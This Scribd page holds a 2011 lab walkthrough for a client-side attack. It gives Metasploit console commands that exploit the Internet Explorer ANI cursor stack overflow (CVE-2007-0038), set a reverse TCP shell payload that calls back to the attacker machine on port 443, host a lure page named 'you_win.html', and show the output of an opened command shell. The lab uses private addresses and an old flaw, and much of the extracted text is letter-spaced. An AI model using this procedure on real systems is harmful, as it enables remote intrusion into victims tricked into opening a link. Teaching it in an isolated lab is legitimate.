Scribd Logo
Unggah

Selamat datang di Scribd!

  • Client Side

    Diunggah oleh

    Donay X Small
    15 tayangan6 halaman
    jh

    Hak Cipta

    © © All Rights Reserved

    Format Tersedia

    PDF, TXT atau baca online dari Scribd

    Apakah menurut Anda dokumen ini bermanfaat?

    Apakah konten ini tidak pantas?

    Laporkan Dokumen Ini
    jh

    Hak Cipta:

    © All Rights Reserved
    Unduh sebagai PDF, TXT atau baca online dari Scribd
    Tandai sebagai konten tidak pantas
    15 tayangan6 halaman

    Client Side

    Diunggah oleh

    Donay X Small
    jh

    Hak Cipta:

    © All Rights Reserved
    Unduh sebagai PDF, TXT atau baca online dari Scribd
    Tandai sebagai konten tidak pantas
    dari 6

    2011-BR

    1

    CLIENT SIDE ATTACK


    Configuration:

    Your machine is HACKER, running Windows XP Professional.
    The IP address of your machine is 192.168.100.66/24.
    Your target machine is WIN2003, running Windows 2003.
    The IP address of target machine is 192.168.100.1/24.

    Objectives:

    Perfom client side attack/hacking by exploiting internet explorer and do a reverse
    shell connection through port 443 (SSL).

    Tools:

    Metasploit 3.3

    Preparation:

    Ensure that HACKER and WIN2003 virtual machines are connected.
    Logon to HACKER virtual machine and try to test connectivity between these
    two machines by using standard PING command.
    2011-BR

    2

    Exploiting Internet Explorer
    Detailed Steps:

    1. On HACKER machine, launch Metasploit Framework 3.3 by navigating to c:\msf3, then
    run msfweb.bat , or you can use msfconsole.bat ;) if you dont want a web interface.

    2. After your metasploit loaded into the browser, click on console .


















    msf > show exploits

    Display all the available exploits.

    msf > show exploits

    Now we will try to find an exploit related the bwoser

    wi ndows/ br owser / ani _l oadi mage_chunksi ze Wi ndows ANI LoadAni I con( )
    Chunk Si ze St ack Over f l ow ( HTTP)

    3. Now take a look at the exploit information :

    msf > info windows/browser/ani_loadimage_chunksize

    Name: Wi ndows ANI LoadAni I con( ) Chunk Si ze St ack Over f l ow ( HTTP)
    Ver si on : 5773
    Pl at f or m: Wi ndows
    Pr i vi l eged: No
    Li cense: Met aspl oi t Fr amewor k Li cense ( BSD)
    Pr ovi ded by: hdm<hdm@met aspl oi t . com>
    skape <mmi l l er @hi ck. or g>
    Sol ar Ecl i pse sol ar ecl i pse@phr eedom. or g
    2011-BR

    3

    H D Moor e <hdm[ at ] met aspl oi t . com>

    Avai l abl e t ar get s:
    I d Name
    - - - - - -
    0 ( Aut omat i c) I E6, I E7 and Fi r ef ox on Wi ndows NT, 2000, XP, 2003 and
    Vi st a 1 I E6 on Wi ndows NT, 2000, XP, 2003 ( al l l anguages)
    2 I E7 on Wi ndows XP SP2, 2003 SP1, SP2 ( al l l anguages)
    3 I E7 and Fi r ef ox on Wi ndows Vi st a ( al l l anguages)
    4 Fi r ef ox on Wi ndows XP ( Engl i sh)
    5 Fi r ef ox on Wi ndows 2003 ( Engl i sh)

    Basi c opt i ons:

    Name Cur r ent Set t i ng Requi r ed Descr i pt i on
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    SRVHOST 0. 0. 0. 0 yes The l ocal host t o l i st en on.
    SRVPORT 8080 yes The l ocal por t t o l i st en on.
    SSL f al se no Use SSL
    URI PATH no The URI t o use f or t hi s expl oi t ( def aul t i s r andom)

    Payl oad i nf or mat i on:
    Space: 1824

    Descr i pt i on:
    Thi s modul e expl oi t s a buf f er over f l ow vul ner abi l i t y i n t he
    LoadAni I con( ) f unct i on i n USER32. dl l . The f l aw can be t r i gger ed t hr ough
    I nt er net Expl or er 6 and 7 by usi ng t he CURSOR st yl e sheet di r ect i ve t o
    l oad a mal i ci ous . ANI f i l e. The modul e can al so expl oi t Mozi l l a Fi r ef ox
    by usi ng a UNC pat h i n a moz- i con URL and ser vi ng t he . ANI f i l e over
    WebDAV. The vul ner abl e code i n USER32. dl l wi l l cat ch any except i ons
    t hat occur whi l e t he i nval i d cur sor i s l oaded, causi ng t he expl oi t t o
    si l ent l y f ai l when t he wr ong t ar get has been chosen. Thi s vul ner abi l i t y
    was di scover ed by Al exander Sot i r ov of Det er mi na and was r edi scover ed,
    i n t he wi l d, by McAf ee.

    Ref er ences:
    ht t p: / / cve. mi t r e. or g/ cgi - bi n/ cvename. cgi ?name=2007- 0038
    ht t p: / / www. secur i t yf ocus. com/ bi d/ 23194
    ht t p: / / www. mi cr osof t . com/ t echnet / secur i t y/ advi sor y/ 935423. mspx
    ht t p: / / www. det er mi na. com/ secur i t y. r esear ch/ vul ner abi l i t i es/ ani -
    header . ht ml

    4. Use that exploit :

    msf > use windows/browser/ani_loadimage_chunksize

    5. Then show the payloads available :

    msf expl oi t ( ani _l oadi mage_chunksi ze) > show payloads





    2011-BR

    4

    6. Then select wi ndows/ shel l _r ever se_t cp payload :

    msf expl oi t ( ani _l oadi mage_chunksi ze) > set PAYLOAD
    windows/shell_reverse_tcp


    7. Show all of the options that needed for the exploit & payload:

    >> show options
    Modul e opt i ons:
    Name Cur r ent Set t i ng Requi r ed Descr i pt i on
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    SRVHOST 0. 0. 0. 0 yes The l ocal host t o l i st en on.
    SRVPORT 8080 yes The l ocal por t t o l i st en on.
    SSL f al se no Use SSL
    URI PATH no The URI t o use f or t hi s expl oi t
    ( def aul t i s r andom)

    Payl oad opt i ons ( wi ndows/ shel l _r ever se_t cp) :

    Name Cur r ent Set t i ng Requi r ed Descr i pt i on
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    EXI TFUNC pr ocess yes Exi t t echni que: seh, t hr ead,
    pr ocess
    LHOST yes The l ocal addr ess
    LPORT 4444 yes The l ocal por t

    8. Then set the options :

    >> set SRVHOST 192. 168. 100. 66
    SRVHOST => 192. 168. 100. 66

    >> set SRVPORT 80
    SRVPORT => 80

    >> set URI PATH you_wi n. ht ml
    URI PATH => you_wi n. ht ml

    >> set LHOST 192. 168. 100. 66
    LHOST => 192. 168. 100. 66

    >> set LPORT 443
    LPORT => 443

    Now weve set the option to setup a fake web server running in port 80, and setup a
    fake page you_win.html. So when a client open that link, they will initiate a
    connection through port 443 (commonly used for SSL)

    2011-BR

    5

    9. Launch the exploit :






















    10. In this state, your metasploit is waiting for the connection. And generate a
    hyperlink : http://192.168.100.66:80/you_win.html

    11. Go to your WIN2003 machine, using internet explorer open that hyperlink.





















    2011-BR

    6

    12. As you can see, the internet explorer 6 will hang. And this is also normal. Go back
    to your metasploit, you will something similar to this :

    [ *] Expl oi t r unni ng as backgr ound j ob.
    [ *] St ar t ed r ever se handl er
    [ *] Usi ng URL: ht t p: / / 192. 168. 100. 66: 80/ you_wi n. ht ml
    [ *] Ser ver st ar t ed.
    [ *] At t empt i ng t o expl oi t ani _l oadi mage_chunksi ze
    [ *] Sendi ng HTML page t o 192. 168. 100. 1: 1316. . .
    [ *] At t empt i ng t o expl oi t ani _l oadi mage_chunksi ze
    [ *] Sendi ng Wi ndows ANI LoadAni I con( ) Chunk Si ze St ack Over f l ow ( HTTP)
    t o 192. 168. 100. 1: 1316. . .
    [ *] Command shel l sessi on 1 opened ( 192. 168. 100. 66: 443 - >
    192. 168. 100. 1: 1317)


    The exploit is working !, then you got one shell session opened. Now, try to open
    that session.

    msf expl oi t ( ani _l oadi mage_chunksi ze) > sessi ons - i 1


























    13. Congr at ul at i ons !

    Anda mungkin juga menyukai